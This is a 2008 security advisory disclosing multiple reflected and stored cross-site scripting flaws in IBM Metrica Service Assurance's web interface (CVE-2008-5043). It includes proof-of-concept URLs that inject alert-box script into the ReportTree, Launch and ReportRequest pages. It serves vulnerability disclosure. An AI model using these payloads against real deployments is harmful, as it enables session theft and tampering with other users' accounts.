Metrica Service Assurance Multiple Cross Site Scripting

2008.11.09

Credit: Francesco Bianchino

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2008-5043

CWE: CWE-79

CVSS Base Score: 3.5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 6.8/10

Exploit range: Remote

Attack complexity: Medium

Authentication: Single time

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

Metrica Service Assurance Multiple Cross Site Scripting

***********************************************************************

Author: Francesco Bianchino

Email: f.bianchino_at_gmail&#46;com

Title: Metrica Service Assurance Multiple Cross Site Scripting

Vendor: IBM

***********************************************************************

Summary

Metrica Service Assurance Framework implements a distributed,
object-oriented, J2EE-based architecture. It work with a Web-based
user interfaces, from end-user report generation to detailed system
administration and configuration.

***********************************************************************

Vulnerability Detail

The web-based interface of Metrica Service Assurance is exposed to
multiple XSS attack. With an authenticated user it's possible to steal
other user's sessions due to a flaw in the input validation
mechanisms.
A persistant XSS permits the insertion of malicious code into the
web-based interface. Using the report generation function it is
possible to create a report with malicious code in the name.
That code is than rendered on the victim's browser when opening the
report history which can be found in the main panel of the
application.
The code also persists into the main panel and all the users are
exposed to the attack.

There are at least three vulnerable pages:

       Non persistant:
       * http://server/<document root>/ReportTree
       * http://server/<document root>/Launch

       Peristant:
       * http://server/<document root>/ReportRequest

***********************************************************************

Exploit

http://server/<document
root>/ReportTree?action=generatedreportresults&elementid="><SCRIPT>alert("Non
persistant XSS");</SCRIPT><!--&date=0000000000000

http://server/<document root>/Launch?jnlpname=="><SCRIPT>alert("Non
Persistant XSS");</SCRIPT>

http://server/<document_root>/ReportRequest?dateformat=dd%2FMM%2Fyyyy&reporttitle=some_title&reportID=some_stuff&version=0&treesrc=&treetitle=&p_wstring=&p_dataperiod=none%3A%23%3Araw&startdate=01%2F01%2F2008&reporttype=offline&%3Atasklabel=<SCRIPT>alert(Persistant
XSS!);</SCRIPT>&none_agg_specified=false&windowtype=main

***********************************************************************

Solution

At the moment of writing this advisory the is no solution yet.

***********************************************************************

Credits

Discovered and advised to IBM, November 2008 by Francesco Bianchino.
Thanks to Marco borza and to da EthicalHAkinTeam.

References:

http://xforce.iss.net/xforce/xfdb/46495

http://www.securityfocus.com/bid/32233

http://www.securityfocus.com/archive/1/archive/1/498168/100/0/threaded

http://lists.grok.org.uk/pipermail/full-disclosure/2008-November/065520.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Metrica Service Assurance Multiple Cross Site Scripting

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.